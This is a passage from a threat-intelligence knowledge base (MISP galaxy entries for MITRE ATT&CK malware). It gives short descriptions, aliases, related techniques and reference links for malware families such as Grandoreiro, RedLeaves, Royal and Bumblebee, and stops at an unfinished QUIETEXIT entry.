https://researchcenter.paloaltonetworks.com/2016/09/dualtoy-new-windows-trojan-sideloads-risky-apps-to-android-and-ios-devices/

Grandoreiro - S0531

[Grandoreiro](https://attack.mitre.org/software/S0531) is a banking trojan written in Delphi that was first observed in 2016 and uses a Malware-as-a-Service (MaaS) business model. [Grandoreiro](https://attack.mitre.org/software/S0531) has confirmed victims in Brazil, Mexico, Portugal, and Spain.(Citation: Securelist Brazilian Banking Malware July 2020)(Citation: ESET Grandoreiro April 2020)

The tag is: misp-galaxy:mitre-malware="Grandoreiro - S0531"

Grandoreiro - S0531 is also known as:

  • Grandoreiro

Table 7477. Table References

Links

https://attack.mitre.org/software/S0531

https://securelist.com/the-tetrade-brazilian-banking-malware/97779/

https://www.welivesecurity.com/2020/04/28/grandoreiro-how-engorged-can-exe-get/

RedLeaves - S0153

[RedLeaves](https://attack.mitre.org/software/S0153) is a malware family used by [menuPass](https://attack.mitre.org/groups/G0045). The code overlaps with [PlugX](https://attack.mitre.org/software/S0013) and may be based upon the open source tool Trochilus. (Citation: PWC Cloud Hopper Technical Annex April 2017) (Citation: FireEye APT10 April 2017)

The tag is: misp-galaxy:mitre-malware="RedLeaves - S0153"

RedLeaves - S0153 is also known as:

  • RedLeaves

  • BUGJUICE

RedLeaves - S0153 has relationships with:

  • similar: misp-galaxy:tool="BUGJUICE" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:malpedia="RedLeaves" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:rat="RedLeaves" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-attack-pattern="System Network Connections Discovery - T1049" with estimative-language:likelihood-probability="almost-certain"

Table 7478. Table References

Links

https://attack.mitre.org/software/S0153

https://twitter.com/ItsReallyNick/status/850105140589633536

https://www.fireeye.com/blog/threat-research/2017/04/apt10_menupass_grou.html

https://www.pwc.co.uk/cyber-security/pdf/pwc-uk-operation-cloud-hopper-technical-annex-april-2017.pdf

Snip3 - S1086

[Snip3](https://attack.mitre.org/software/S1086) is a sophisticated crypter-as-a-service that has been used since at least 2021 to obfuscate and load numerous strains of malware including [AsyncRAT](https://attack.mitre.org/software/S1087), [Revenge RAT](https://attack.mitre.org/software/S0379), [Agent Tesla](https://attack.mitre.org/software/S0331), and [NETWIRE](https://attack.mitre.org/software/S0198).(Citation: Morphisec Snip3 May 2021)(Citation: Telefonica Snip3 December 2021)

The tag is: misp-galaxy:mitre-malware="Snip3 - S1086"

Snip3 - S1086 is also known as:

  • Snip3

Table 7479. Table References

Links

https://attack.mitre.org/software/S1086

https://blog.morphisec.com/revealing-the-snip3-crypter-a-highly-evasive-rat-loader

https://telefonicatech.com/blog/snip3-investigacion-malware

USBStealer - S0136

[USBStealer](https://attack.mitre.org/software/S0136) is malware that has been used by [APT28](https://attack.mitre.org/groups/G0007) since at least 2005 to extract information from air-gapped networks. It does not have the capability to communicate over the Internet and has been used in conjunction with [ADVSTORESHELL](https://attack.mitre.org/software/S0045). (Citation: ESET Sednit USBStealer 2014) (Citation: Kaspersky Sofacy)

The tag is: misp-galaxy:mitre-malware="USBStealer - S0136"

USBStealer - S0136 is also known as:

  • USBStealer

  • USB Stealer

  • Win32/USBStealer

USBStealer - S0136 has relationships with:

  • similar: misp-galaxy:tool="USBStealer" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"

Table 7480. Table References

Links

http://www.welivesecurity.com/2014/11/11/sednit-espionage-group-attacking-air-gapped-networks/

https://attack.mitre.org/software/S0136

https://securelist.com/sofacy-apt-hits-high-profile-targets-with-updated-toolset/72924/

Chaes - S0631

[Chaes](https://attack.mitre.org/software/S0631) is a multistage information stealer written in several programming languages that collects login credentials, credit card numbers, and other financial information. [Chaes](https://attack.mitre.org/software/S0631) was first observed in 2020, and appears to primarily target victims in Brazil as well as other e-commerce customers in Latin America.(Citation: Cybereason Chaes Nov 2020)

The tag is: misp-galaxy:mitre-malware="Chaes - S0631"

Chaes - S0631 is also known as:

  • Chaes

Table 7481. Table References

Links

https://attack.mitre.org/software/S0631

https://www.cybereason.com/hubfs/dam/collateral/reports/11-2020-Chaes-e-commerce-malware-research.pdf

Janicab - S0163

[Janicab](https://attack.mitre.org/software/S0163) is an OS X trojan that relied on a valid developer ID and oblivious users to install it. (Citation: Janicab)

The tag is: misp-galaxy:mitre-malware="Janicab - S0163"

Janicab - S0163 is also known as:

  • Janicab

Janicab - S0163 has relationships with:

  • similar: misp-galaxy:tool="Janicab" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-attack-pattern="Local Job Scheduling - T1168" with estimative-language:likelihood-probability="almost-certain"

Table 7482. Table References

Links

http://www.thesafemac.com/new-signed-malware-called-janicab/

https://attack.mitre.org/software/S0163

STARWHALE - S1037

[STARWHALE](https://attack.mitre.org/software/S1037) is Windows Script File (WSF) backdoor that has been used by [MuddyWater](https://attack.mitre.org/groups/G0069), possibly since at least November 2021; there is also a [STARWHALE](https://attack.mitre.org/software/S1037) variant written in Golang with similar capabilities. Security researchers have also noted the use of [STARWHALE](https://attack.mitre.org/software/S1037) by UNC3313, which may be associated with [MuddyWater](https://attack.mitre.org/groups/G0069).(Citation: Mandiant UNC3313 Feb 2022)(Citation: DHS CISA AA22-055A MuddyWater February 2022)

The tag is: misp-galaxy:mitre-malware="STARWHALE - S1037"

STARWHALE - S1037 is also known as:

  • STARWHALE

  • CANOPY

Table 7483. Table References

Links

https://attack.mitre.org/software/S1037

https://www.cisa.gov/uscert/ncas/alerts/aa22-055a

https://www.mandiant.com/resources/telegram-malware-iranian-espionage

CORESHELL - S0137

[CORESHELL](https://attack.mitre.org/software/S0137) is a downloader used by [APT28](https://attack.mitre.org/groups/G0007). The older versions of this malware are known as SOURFACE and newer versions as CORESHELL.(Citation: FireEye APT28) (Citation: FireEye APT28 January 2017)

The tag is: misp-galaxy:mitre-malware="CORESHELL - S0137"

CORESHELL - S0137 is also known as:

  • CORESHELL

  • Sofacy

  • SOURFACE

CORESHELL - S0137 has relationships with:

  • similar: misp-galaxy:tool="SOURFACE" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:tool="CORESHELL" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"

Table 7484. Table References

Links

https://attack.mitre.org/software/S0137

https://securelist.com/a-slice-of-2017-sofacy-activity/83930/

https://web.archive.org/web/20151022204649/https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-apt28.pdf

https://www2.fireeye.com/rs/848-DID-242/images/APT28-Center-of-Storm-2017.pdf

FLIPSIDE - S0173

[FLIPSIDE](https://attack.mitre.org/software/S0173) is a simple tool similar to Plink that is used by [FIN5](https://attack.mitre.org/groups/G0053) to maintain access to victims. (Citation: Mandiant FIN5 GrrCON Oct 2016)

The tag is: misp-galaxy:mitre-malware="FLIPSIDE - S0173"

FLIPSIDE - S0173 is also known as:

  • FLIPSIDE

FLIPSIDE - S0173 has relationships with:

  • uses: misp-galaxy:mitre-attack-pattern="Application Layer Protocol - T1071" with estimative-language:likelihood-probability="almost-certain"

Table 7485. Table References

Links

https://attack.mitre.org/software/S0173

https://www.youtube.com/watch?v=fevGZs0EQu8

POWERTON - S0371

[POWERTON](https://attack.mitre.org/software/S0371) is a custom PowerShell backdoor first observed in 2018. It has typically been deployed as a late-stage backdoor by [APT33](https://attack.mitre.org/groups/G0064). At least two variants of the backdoor have been identified, with the later version containing improved functionality.(Citation: FireEye APT33 Guardrail)

The tag is: misp-galaxy:mitre-malware="POWERTON - S0371"

POWERTON - S0371 is also known as:

  • POWERTON

Table 7486. Table References

Links

https://attack.mitre.org/software/S0371

https://www.fireeye.com/blog/threat-research/2018/12/overruled-containing-a-potentially-destructive-adversary.html

Marcher - S0317

[Marcher](https://attack.mitre.org/software/S0317) is Android malware that is used for financial fraud. (Citation: Proofpoint-Marcher)

The tag is: misp-galaxy:mitre-malware="Marcher - S0317"

Table 7487. Table References

Links

https://attack.mitre.org/software/S0317

https://www.proofpoint.com/us/threat-insight/post/credential-phishing-and-android-banking-trojan-combine-austrian-mobile-attacks

Royal - S1073

[Royal](https://attack.mitre.org/software/S1073) is ransomware that first appeared in early 2022; a version that also targets ESXi servers was later observed in February 2023. [Royal](https://attack.mitre.org/software/S1073) employs partial encryption and multiple threads to evade detection and speed encryption. [Royal](https://attack.mitre.org/software/S1073) has been used in attacks against multiple industries worldwide—​including critical infrastructure. Security researchers have identified similarities in the encryption routines and TTPs used in [Royal](https://attack.mitre.org/software/S1073) and [Conti](https://attack.mitre.org/software/S0575) attacks and noted a possible connection between their operators.(Citation: Microsoft Royal ransomware November 2022)(Citation: Cybereason Royal December 2022)(Citation: Kroll Royal Deep Dive February 2023)(Citation: Trend Micro Royal Linux ESXi February 2023)(Citation: CISA Royal AA23-061A March 2023)

The tag is: misp-galaxy:mitre-malware="Royal - S1073"

Royal - S1073 is also known as:

  • Royal

Table 7488. Table References

Links

https://attack.mitre.org/software/S1073

https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-061a

https://www.cybereason.com/blog/royal-ransomware-analysis

https://www.kroll.com/en/insights/publications/cyber/royal-ransomware-deep-dive

https://www.microsoft.com/en-us/security/blog/2022/11/17/dev-0569-finds-new-ways-to-deliver-royal-ransomware-various-payloads/

https://www.trendmicro.com/en_us/research/23/b/royal-ransomware-expands-attacks-by-targeting-linux-esxi-servers.html

OLDBAIT - S0138

[OLDBAIT](https://attack.mitre.org/software/S0138) is a credential harvester used by [APT28](https://attack.mitre.org/groups/G0007). (Citation: FireEye APT28) (Citation: FireEye APT28 January 2017)

The tag is: misp-galaxy:mitre-malware="OLDBAIT - S0138"

OLDBAIT - S0138 is also known as:

  • OLDBAIT

  • Sasfis

OLDBAIT - S0138 has relationships with:

  • similar: misp-galaxy:tool="OLDBAIT" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"

Table 7489. Table References

Links

https://attack.mitre.org/software/S0138

https://web.archive.org/web/20151022204649/https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-apt28.pdf

https://www2.fireeye.com/rs/848-DID-242/images/APT28-Center-of-Storm-2017.pdf

FlawedAmmyy - S0381

[FlawedAmmyy](https://attack.mitre.org/software/S0381) is a remote access tool (RAT) that was first seen in early 2016. The code for [FlawedAmmyy](https://attack.mitre.org/software/S0381) was based on leaked source code for a version of Ammyy Admin, a remote access software.(Citation: Proofpoint TA505 Mar 2018)

The tag is: misp-galaxy:mitre-malware="FlawedAmmyy - S0381"

FlawedAmmyy - S0381 is also known as:

  • FlawedAmmyy

Table 7490. Table References

Links

https://attack.mitre.org/software/S0381

https://www.proofpoint.com/us/threat-insight/post/leaked-ammyy-admin-source-code-turned-malware

Chameleon - S1083

[Chameleon](https://attack.mitre.org/software/S1083) is an Android banking trojan that can leverage Android’s Accessibility Services to perform malicious activities. Believed to have been first active in January 2023, [Chameleon](https://attack.mitre.org/software/S1083) has been observed targeting users in Australia and Poland by masquerading as official apps.(Citation: cyble_chameleon_0423)

The tag is: misp-galaxy:mitre-malware="Chameleon - S1083"

Chameleon - S1083 is also known as:

  • Chameleon

Table 7491. Table References

Links

https://attack.mitre.org/software/S1083

https://cyble.com/blog/chameleon-a-new-android-malware-spotted-in-the-wild/

HAWKBALL - S0391

[HAWKBALL](https://attack.mitre.org/software/S0391) is a backdoor that was observed in targeting of the government sector in Central Asia.(Citation: FireEye HAWKBALL Jun 2019)

The tag is: misp-galaxy:mitre-malware="HAWKBALL - S0391"

HAWKBALL - S0391 is also known as:

  • HAWKBALL

Table 7492. Table References

Links

https://attack.mitre.org/software/S0391

https://www.fireeye.com/blog/threat-research/2019/06/government-in-central-asia-targeted-with-hawkball-backdoor.html

Allwinner - S0319

[Allwinner](https://attack.mitre.org/software/S0319) is a company that supplies processors used in Android tablets and other devices. A Linux kernel distributed by [Allwinner](https://attack.mitre.org/software/S0319) for use on these devices reportedly contained a backdoor. (Citation: HackerNews-Allwinner)

The tag is: misp-galaxy:mitre-malware="Allwinner - S0319"

Table 7493. Table References

Links

https://attack.mitre.org/software/S0319

https://thehackernews.com/2016/05/android-kernal-exploit.html

Bumblebee - S1039

[Bumblebee](https://attack.mitre.org/software/S1039) is a custom loader written in C++ that has been used by multiple threat actors, including possible initial access brokers, to download and execute additional payloads since at least March 2022. [Bumblebee](https://attack.mitre.org/software/S1039) has been linked to ransomware operations including [Conti](https://attack.mitre.org/software/S0575), Quantum, and Mountlocker and derived its name from the appearance of "bumblebee" in the user-agent.(Citation: Google EXOTIC LILY March 2022)(Citation: Proofpoint Bumblebee April 2022)(Citation: Symantec Bumblebee June 2022)

The tag is: misp-galaxy:mitre-malware="Bumblebee - S1039"

Bumblebee - S1039 is also known as:

  • Bumblebee

Table 7494. Table References

Links

https://attack.mitre.org/software/S1039

https://blog.google/threat-analysis-group/exposing-initial-access-broker-ties-conti/

https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/bumblebee-loader-cybercrime

https://www.proofpoint.com/us/blog/threat-insight/bumblebee-is-still-transforming

PowerDuke - S0139

[PowerDuke](https://attack.mitre.org/software/S0139) is a backdoor that was used by [APT29](https://attack.mitre.org/groups/G0016) in 2016. It has primarily been delivered through Microsoft Word or Excel attachments containing malicious macros. (Citation: Volexity PowerDuke November 2016)

The tag is: misp-galaxy:mitre-malware="PowerDuke - S0139"

PowerDuke - S0139 is also known as:

  • PowerDuke

PowerDuke - S0139 has relationships with:

  • similar: misp-galaxy:malpedia="PowerDuke" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-attack-pattern="File Deletion - T1107" with estimative-language:likelihood-probability="almost-certain"

Table 7495. Table References

Links

https://attack.mitre.org/software/S0139

https://www.volexity.com/blog/2016/11/09/powerduke-post-election-spear-phishing-campaigns-targeting-think-tanks-and-ngos/

FlyTrap - S1093

[FlyTrap](https://attack.mitre.org/software/S1093) is an Android trojan, first detected in March 2021, that uses social engineering tactics to compromise Facebook accounts. [FlyTrap](https://attack.mitre.org/software/S1093) was initially detected through infected apps on the Google Play store, and is believed to have impacted over 10,000 victims across at least 140 countries.(Citation: Trend Micro FlyTrap)

The tag is: misp-galaxy:mitre-malware="FlyTrap - S1093"

FlyTrap - S1093 is also known as:

  • FlyTrap

Table 7496. Table References

Links

https://attack.mitre.org/software/S1093

https://news.trendmicro.com/2021/08/17/flytrap-android-malware-is-taking-over-facebook-accounts-protect-yourself-with-a-malware-scanner/

BabyShark - S0414

[BabyShark](https://attack.mitre.org/software/S0414) is a Microsoft Visual Basic (VB) script-based malware family that is believed to be associated with several North Korean campaigns. (Citation: Unit42 BabyShark Feb 2019)

The tag is: misp-galaxy:mitre-malware="BabyShark - S0414"

BabyShark - S0414 is also known as:

  • BabyShark

Table 7497. Table References

Links

https://attack.mitre.org/software/S0414

https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/

https://unit42.paloaltonetworks.com/new-babyshark-malware-targets-u-s-national-security-think-tanks/

ChChes - S0144

[ChChes](https://attack.mitre.org/software/S0144) is a Trojan that appears to be used exclusively by [menuPass](https://attack.mitre.org/groups/G0045). It was used to target Japanese organizations in 2016. Its lack of persistence methods suggests it may be intended as a first-stage tool. (Citation: Palo Alto menuPass Feb 2017) (Citation: JPCERT ChChes Feb 2017) (Citation: PWC Cloud Hopper Technical Annex April 2017)

The tag is: misp-galaxy:mitre-malware="ChChes - S0144"

ChChes - S0144 is also known as:

  • ChChes

  • Scorpion

  • HAYMAKER

ChChes - S0144 has relationships with:

  • similar: misp-galaxy:malpedia="ChChes" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:tool="HAYMAKER" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-attack-pattern="Application Layer Protocol - T1071" with estimative-language:likelihood-probability="almost-certain"

Table 7498. Table References

Links

http://blog.jpcert.or.jp/2017/02/chches-malware—​93d6.html

http://researchcenter.paloaltonetworks.com/2017/02/unit42-menupass-returns-new-malware-new-attacks-japanese-academics-organizations/

https://attack.mitre.org/software/S0144

https://twitter.com/ItsReallyNick/status/850105140589633536

https://www.fireeye.com/blog/threat-research/2017/04/apt10_menupass_grou.html

https://www.pwc.co.uk/cyber-security/pdf/pwc-uk-operation-cloud-hopper-technical-annex-april-2017.pdf

FunnyDream - S1044

[FunnyDream](https://attack.mitre.org/software/S1044) is a backdoor with multiple components that was used during the [FunnyDream](https://attack.mitre.org/campaigns/C0007) campaign since at least 2019, primarily for execution and exfiltration.(Citation: Bitdefender FunnyDream Campaign November 2020)

The tag is: misp-galaxy:mitre-malware="FunnyDream - S1044"

FunnyDream - S1044 is also known as:

  • FunnyDream

Table 7499. Table References

Links

https://attack.mitre.org/software/S1044

https://www.bitdefender.com/files/News/CaseStudies/study/379/Bitdefender-Whitepaper-Chinese-APT.pdf

PowerShower - S0441

[PowerShower](https://attack.mitre.org/software/S0441) is a PowerShell backdoor used by [Inception](https://attack.mitre.org/groups/G0100) for initial reconnaissance and to download and execute second stage payloads.(Citation: Unit 42 Inception November 2018)(Citation: Kaspersky Cloud Atlas August 2019)

The tag is: misp-galaxy:mitre-malware="PowerShower - S0441"

PowerShower - S0441 is also known as:

  • PowerShower

Table 7500. Table References

Links

https://attack.mitre.org/software/S0441

https://securelist.com/recent-cloud-atlas-activity/92016/

https://unit42.paloaltonetworks.com/unit42-inception-attackers-target-europe-year-old-office-vulnerability/

BOOSTWRITE - S0415

[BOOSTWRITE](https://attack.mitre.org/software/S0415) is a loader crafted to be launched via abuse of the DLL search order of applications used by [FIN7](https://attack.mitre.org/groups/G0046).(Citation: FireEye FIN7 Oct 2019)

The tag is: misp-galaxy:mitre-malware="BOOSTWRITE - S0415"

BOOSTWRITE - S0415 is also known as:

  • BOOSTWRITE

Table 7501. Table References

Links

https://attack.mitre.org/software/S0415

https://www.fireeye.com/blog/threat-research/2019/10/mahalo-fin7-responding-to-new-tools-and-techniques.html

POWERSOURCE - S0145

[POWERSOURCE](https://attack.mitre.org/software/S0145) is a PowerShell backdoor that is a heavily obfuscated and modified version of the publicly available tool DNS_TXT_Pwnage. It was observed in February 2017 in spearphishing campaigns against personnel involved with United States Securities and Exchange Commission (SEC) filings at various organizations. The malware was delivered when macros were enabled by the victim and a VBS script was dropped. (Citation: FireEye FIN7 March 2017) (Citation: Cisco DNSMessenger March 2017)

The tag is: misp-galaxy:mitre-malware="POWERSOURCE - S0145"

POWERSOURCE - S0145 is also known as:

  • POWERSOURCE

  • DNSMessenger

POWERSOURCE - S0145 has relationships with:

  • similar: misp-galaxy:malpedia="DNSMessenger" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:rat="DNSMessenger" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:mitre-malware="TEXTMATE - S0146" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-attack-pattern="Application Layer Protocol - T1071" with estimative-language:likelihood-probability="almost-certain"

Table 7502. Table References

Links

http://blog.talosintelligence.com/2017/03/dnsmessenger.html

https://attack.mitre.org/software/S0145

https://web.archive.org/web/20180808125108/https:/www.fireeye.com/blog/threat-research/2017/03/fin7_spear_phishing.html

Drinik - S1054

[Drinik](https://attack.mitre.org/software/S1054) is an evolving Android banking trojan that was observed targeting customers of around 27 banks in India in August 2021. Initially seen as an SMS stealer in 2016, [Drinik](https://attack.mitre.org/software/S1054) resurfaced as a banking trojan with more advanced capabilities included in subsequent versions between September 2021 and August 2022.(Citation: cyble_drinik_1022)

The tag is: misp-galaxy:mitre-malware="Drinik - S1054"

Drinik - S1054 is also known as:

  • Drinik

Table 7503. Table References

Links

https://attack.mitre.org/software/S1054

https://blog.cyble.com/2022/10/27/drinik-malware-returns-with-advanced-capabilities-targeting-indian-taxpayers/

LoudMiner - S0451

[LoudMiner](https://attack.mitre.org/software/S0451) is a cryptocurrency miner which uses virtualization software to siphon system resources. The miner has been bundled with pirated copies of Virtual Studio Technology (VST) for Windows and macOS.(Citation: ESET LoudMiner June 2019)

The tag is: misp-galaxy:mitre-malware="LoudMiner - S0451"

LoudMiner - S0451 is also known as:

  • LoudMiner

Table 7504. Table References

Links

https://attack.mitre.org/software/S0451

https://www.welivesecurity.com/2019/06/20/loudminer-mining-cracked-vst-software/

WellMess - S0514

[WellMess](https://attack.mitre.org/software/S0514) is lightweight malware family with variants written in .NET and Golang that has been in use since at least 2018 by [APT29](https://attack.mitre.org/groups/G0016).(Citation: CISA WellMess July 2020)(Citation: PWC WellMess July 2020)(Citation: NCSC APT29 July 2020)

The tag is: misp-galaxy:mitre-malware="WellMess - S0514"

WellMess - S0514 is also known as:

  • WellMess

Table 7505. Table References

Links

https://attack.mitre.org/software/S0514

https://us-cert.cisa.gov/ncas/analysis-reports/ar20-198b

https://www.ncsc.gov.uk/files/Advisory-APT29-targets-COVID-19-vaccine-development-V1-1.pdf

https://www.pwc.co.uk/issues/cyber-security-services/insights/cleaning-up-after-wellmess.html

TEXTMATE - S0146

[TEXTMATE](https://attack.mitre.org/software/S0146) is a second-stage PowerShell backdoor that is memory-resident. It was observed being used along with [POWERSOURCE](https://attack.mitre.org/software/S0145) in February 2017. (Citation: FireEye FIN7 March 2017)

The tag is: misp-galaxy:mitre-malware="TEXTMATE - S0146"

TEXTMATE - S0146 is also known as:

  • TEXTMATE

  • DNSMessenger

TEXTMATE - S0146 has relationships with:

  • similar: misp-galaxy:malpedia="DNSMessenger" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:rat="DNSMessenger" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:mitre-malware="POWERSOURCE - S0145" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-attack-pattern="Application Layer Protocol - T1071" with estimative-language:likelihood-probability="almost-certain"

Table 7506. Table References

Links

http://blog.talosintelligence.com/2017/03/dnsmessenger.html

https://attack.mitre.org/software/S0146

https://web.archive.org/web/20180808125108/https:/www.fireeye.com/blog/threat-research/2017/03/fin7_spear_phishing.html

CostaBricks - S0614

[CostaBricks](https://attack.mitre.org/software/S0614) is a loader that was used to deploy 32-bit backdoors in the [CostaRicto](https://attack.mitre.org/groups/G0132) campaign.(Citation: BlackBerry CostaRicto November 2020)

The tag is: misp-galaxy:mitre-malware="CostaBricks - S0614"

CostaBricks - S0614 is also known as:

  • CostaBricks

Table 7507. Table References

Links

https://attack.mitre.org/software/S0614

https://blogs.blackberry.com/en/2020/11/the-costaricto-campaign-cyber-espionage-outsourced

SDBbot - S0461

[SDBbot](https://attack.mitre.org/software/S0461) is a backdoor with installer and loader components that has been used by [TA505](https://attack.mitre.org/groups/G0092) since at least 2019.(Citation: Proofpoint TA505 October 2019)(Citation: IBM TA505 April 2020)

The tag is: misp-galaxy:mitre-malware="SDBbot - S0461"

SDBbot - S0461 is also known as:

  • SDBbot

Table 7508. Table References

Links

https://attack.mitre.org/software/S0461

https://securityintelligence.com/posts/ta505-continues-to-infect-networks-with-sdbbot-rat/

https://www.proofpoint.com/us/threat-insight/post/ta505-distributes-new-sdbbot-remote-access-trojan-get2-downloader

SVCReady - S1064

[SVCReady](https://attack.mitre.org/software/S1064) is a loader that has been used since at least April 2022 in malicious spam campaigns. Security researchers have noted overlaps between [TA551](https://attack.mitre.org/groups/G0127) activity and [SVCReady](https://attack.mitre.org/software/S1064) distribution, including similarities in file names, lure images, and identical grammatical errors.(Citation: HP SVCReady Jun 2022)

The tag is: misp-galaxy:mitre-malware="SVCReady - S1064"

SVCReady - S1064 is also known as:

  • SVCReady

Table 7509. Table References

Links

https://attack.mitre.org/software/S1064

https://threatresearch.ext.hp.com/svcready-a-new-loader-reveals-itself/

RDFSNIFFER - S0416

[RDFSNIFFER](https://attack.mitre.org/software/S0416) is a module loaded by [BOOSTWRITE](https://attack.mitre.org/software/S0415) which allows an attacker to monitor and tamper with legitimate connections made via an application designed to provide visibility and system management capabilities to remote IT techs.(Citation: FireEye FIN7 Oct 2019)

The tag is: misp-galaxy:mitre-malware="RDFSNIFFER - S0416"

RDFSNIFFER - S0416 is also known as:

  • RDFSNIFFER

Table 7510. Table References

Links

https://attack.mitre.org/software/S0416

https://www.fireeye.com/blog/threat-research/2019/10/mahalo-fin7-responding-to-new-tools-and-techniques.html

TDTESS - S0164

[TDTESS](https://attack.mitre.org/software/S0164) is a 64-bit .NET binary backdoor used by [CopyKittens](https://attack.mitre.org/groups/G0052). (Citation: ClearSky Wilted Tulip July 2017)

The tag is: misp-galaxy:mitre-malware="TDTESS - S0164"

TDTESS - S0164 is also known as:

  • TDTESS

TDTESS - S0164 has relationships with:

  • similar: misp-galaxy:malpedia="TDTESS" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-attack-pattern="File Deletion - T1107" with estimative-language:likelihood-probability="almost-certain"

Table 7511. Table References

Links

http://www.clearskysec.com/wp-content/uploads/2017/07/Operation_Wilted_Tulip.pdf

https://attack.mitre.org/software/S0164

PowGoop - S1046

[PowGoop](https://attack.mitre.org/software/S1046) is a loader that consists of a DLL loader and a PowerShell-based downloader; it has been used by [MuddyWater](https://attack.mitre.org/groups/G0069) as their main loader.(Citation: DHS CISA AA22-055A MuddyWater February 2022)(Citation: CYBERCOM Iranian Intel Cyber January 2022)

The tag is: misp-galaxy:mitre-malware="PowGoop - S1046"

PowGoop - S1046 is also known as:

  • PowGoop

Table 7512. Table References

Links

https://attack.mitre.org/software/S1046

https://www.cisa.gov/uscert/ncas/alerts/aa22-055a

https://www.cybercom.mil/Media/News/Article/2897570/iranian-intel-cyber-suite-of-malware-uses-open-source-tools/

Kobalos - S0641

[Kobalos](https://attack.mitre.org/software/S0641) is a multi-platform backdoor that can be used against Linux, FreeBSD, and Solaris. [Kobalos](https://attack.mitre.org/software/S0641) has been deployed against high profile targets, including high-performance computers, academic servers, an endpoint security vendor, and a large internet service provider; it has been found in Europe, North America, and Asia. [Kobalos](https://attack.mitre.org/software/S0641) was first identified in late 2019.(Citation: ESET Kobalos Feb 2021)(Citation: ESET Kobalos Jan 2021)

The tag is: misp-galaxy:mitre-malware="Kobalos - S0641"

Kobalos - S0641 is also known as:

  • Kobalos

Table 7513. Table References

Links

https://attack.mitre.org/software/S0641

https://www.welivesecurity.com/2021/02/02/kobalos-complex-linux-threat-high-performance-computing-infrastructure/

https://www.welivesecurity.com/wp-content/uploads/2021/01/ESET_Kobalos.pdf

ANDROMEDA - S1074

[ANDROMEDA](https://attack.mitre.org/software/S1074) is commodity malware that was widespread in the early 2010’s and continues to be observed in infections across a wide variety of industries. During the 2022 [C0026](https://attack.mitre.org/campaigns/C0026) campaign, threat actors re-registered expired [ANDROMEDA](https://attack.mitre.org/software/S1074) C2 domains to spread malware to select targets in Ukraine.(Citation: Mandiant Suspected Turla Campaign February 2023)

The tag is: misp-galaxy:mitre-malware="ANDROMEDA - S1074"

ANDROMEDA - S1074 is also known as:

  • ANDROMEDA

Table 7514. Table References

Links

https://attack.mitre.org/software/S1074

https://www.mandiant.com/resources/blog/turla-galaxy-opportunity

GRIFFON - S0417

[GRIFFON](https://attack.mitre.org/software/S0417) is a JavaScript backdoor used by [FIN7](https://attack.mitre.org/groups/G0046). (Citation: SecureList Griffon May 2019)

The tag is: misp-galaxy:mitre-malware="GRIFFON - S0417"

GRIFFON - S0417 is also known as:

  • GRIFFON

Table 7515. Table References

Links

https://attack.mitre.org/software/S0417

https://securelist.com/fin7-5-the-infamous-cybercrime-rig-fin7-continues-its-activities/90703/

Mori - S1047

[Mori](https://attack.mitre.org/software/S1047) is a backdoor that has been used by [MuddyWater](https://attack.mitre.org/groups/G0069) since at least January 2022.(Citation: DHS CISA AA22-055A MuddyWater February 2022)(Citation: CYBERCOM Iranian Intel Cyber January 2022)

The tag is: misp-galaxy:mitre-malware="Mori - S1047"

Mori - S1047 is also known as:

  • Mori

Table 7516. Table References

Links

https://attack.mitre.org/software/S1047

https://www.cisa.gov/uscert/ncas/alerts/aa22-055a

https://www.cybercom.mil/Media/News/Article/2897570/iranian-intel-cyber-suite-of-malware-uses-open-source-tools/

Pteranodon - S0147

[Pteranodon](https://attack.mitre.org/software/S0147) is a custom backdoor used by [Gamaredon Group](https://attack.mitre.org/groups/G0047). (Citation: Palo Alto Gamaredon Feb 2017)

The tag is: misp-galaxy:mitre-malware="Pteranodon - S0147"

Pteranodon - S0147 is also known as:

  • Pteranodon

  • Pterodo

Pteranodon - S0147 has relationships with:

  • similar: misp-galaxy:malpedia="Pteranodon" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-attack-pattern="Data Staged - T1074" with estimative-language:likelihood-probability="almost-certain"

Table 7517. Table References

Links

https://attack.mitre.org/software/S0147

https://researchcenter.paloaltonetworks.com/2017/02/unit-42-title-gamaredon-group-toolset-evolution/

https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/shuckworm-gamaredon-espionage-ukraine

https://www.secureworks.com/research/threat-profiles/iron-tilden

build_downer - S0471

[build_downer](https://attack.mitre.org/software/S0471) is a downloader that has been used by [BRONZE BUTLER](https://attack.mitre.org/groups/G0060) since at least 2019.(Citation: Trend Micro Tick November 2019)

The tag is: misp-galaxy:mitre-malware="build_downer - S0471"

build_downer - S0471 is also known as:

  • build_downer

Table 7518. Table References

Links

https://attack.mitre.org/software/S0471

https://documents.trendmicro.com/assets/pdf/Operation-ENDTRADE-TICK-s-Multi-Stage-Backdoors-for-Attacking-Industries-and-Stealing-Classified-Data.pdf

QUIETEXIT - S1084

